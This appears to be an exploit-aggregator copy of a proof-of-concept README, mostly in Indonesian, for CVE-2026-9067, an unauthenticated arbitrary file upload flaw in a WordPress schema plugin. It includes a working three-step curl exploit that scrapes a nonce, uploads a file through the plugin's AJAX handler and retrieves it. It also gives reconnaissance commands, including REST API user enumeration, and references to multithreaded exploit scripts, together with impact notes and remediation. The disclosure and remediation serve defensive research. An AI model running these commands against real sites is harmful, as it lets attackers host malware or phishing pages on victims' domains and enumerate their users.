Share 
## https://sploitus.com/exploit?id=642054C4-1CED-5BD6-887A-6F06F63071F5
# POC & Xploit - Proof of Concept Directory

Dokumentasi dan exploit untuk vulnerability yang ditemukan di environment WordPress security testing.

---

## Daftar Vulnerability

| CVE ID | Plugin | Severity | Type | Status |
|--------|--------|----------|------|--------|
| [CVE-2026-9067](./CVE-2026-9067.md) | Schema & Structured Data for WP & AMP | High (8.1) | Unrestricted File Upload | Documented |

---

## CVE-2026-9067

### Quick Summary

| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2026-9067 |
| **Plugin** | Schema & Structured Data for WP & AMP |
| **Affected Versions** | < 1.60 |
| **CWE** | CWE-434 (Unrestricted Upload of File with Dangerous Type) |
| **CVSS v3.1** | 8.1 (High) |
| **Finder** | 0xBassia |

### Vulnerability Description

Plugin Schema & Structured Data for WP & AMP sebelum versi 1.60 tidak memvalidasi capability user pada AJAX handlers untuk upload file dan tidak memvalidasi tipe file yang diupload. Ini memungkinkan attacker yang tidak ter-autentikasi untuk mengupload file arbitrary.

### Impact

- **Content Hosting**: Attacker dapat host konten malicious di domain korban
- **Disk Consumption**: Upload file arbitrary dapat menghabiskan disk space
- **Reputation Abuse**: Distribusi malware, phishing pages dari domain korban

**Catatan Penting**: WordPress core memblokir file executable (`.php`, `.phtml`, `.html`, `.svg`), sehingga **tidak ada path RCE langsung** dari vulnerability ini.

### Files

```
CVE-2026-9067/
โ”œโ”€โ”€ CVE-2026-9067.md       # Dokumentasi lengkap (file ini)
โ”œโ”€โ”€ CVE-2026-9067.py       # Python exploit dengan multi-threading
โ”œโ”€โ”€ CVE-2026-9067.sh       # Bash/Shell PoC script
โ””โ”€โ”€ CVE-2026-9067_exploit.sh  # Alternative Bash PoC
```

### Quick PoC

```bash
# Step 1: Get nonce
NONCE=$(curl -s "https://yorbit7.ddev.site/" | grep -oP 'saswp_rf_(page_)?security_nonce["\x27]?\s*:\s*["\']([a-f0-9]{10})["\']' | grep -oP '[a-f0-9]{10}' | head -1)

# Step 2: Upload arbitrary file
curl -X POST 'https://yorbit7.ddev.site/wp-admin/admin-ajax.php' \
  -F 'action=saswp_rf_form_image_upload' \
  -F "saswp_rf_form_nonce=$NONCE" \
  -F 'saswp-rf-form-image=@evil.csv;type=image/png;filename=evil.csv'

# Step 3: Access uploaded file
curl -s "https://yorbit7.ddev.site/wp-content/uploads/$(date +%Y)/$(date +%m)/evil.csv"
```

---

## Environment Information

| Field | Value |
|-------|-------|
| **Target URL** | https://yorbit7.ddev.site |
| **PHP Version** | 8.4 |
| **Database** | MariaDB 11.8 |
| **WordPress Version** | 7.0 |
| **Testing Method** | curl-based (black-box testing) |

---

## Testing Commands

### Check Site Status
```bash
curl -s -o /dev/null -w "%{http_code}" https://yorbit7.ddev.site
```

### Check Plugin Version
```bash
curl -s https://yorbit7.ddev.site/wp-content/plugins/schema-and-structured-data-for-wp/readme.txt | grep -i "Stable tag:"
```

### Enumerate Users
```bash
curl -s https://yorbit7.ddev.site/wp-json/wp/v2/users | jq '.[] | {id, name, slug}'
```

---

## Remediation

1. **Upgrade Plugin**: Update Schema & Structured Data for WP & AMP ke versi 1.60 atau lebih baru
2. **Disable Plugin**: Jika upgrade tidak memungkinkan, nonaktifkan plugin
3. **Hardening**:
   - Set `DISALLOW_FILE_MODIFICATIONS` constant
   - Disable PHP execution di uploads directory via `.htaccess`
   - Implement WAF rules

---

## References

- [NVD CVE-2026-9067](https://nvd.nist.gov/vuln/detail/CVE-2026-9067)
- [WPScan Vulnerability Database](https://wpscan.com/vulnerability/7fac98eb-f82c-4705-a956-aba650945826/)
- [WordPress Plugin Page](https://wordpress.org/plugins/schema-and-structured-data-for-wp/)
- [Original Researcher: 0xBassia](https://github.com/0xBassia)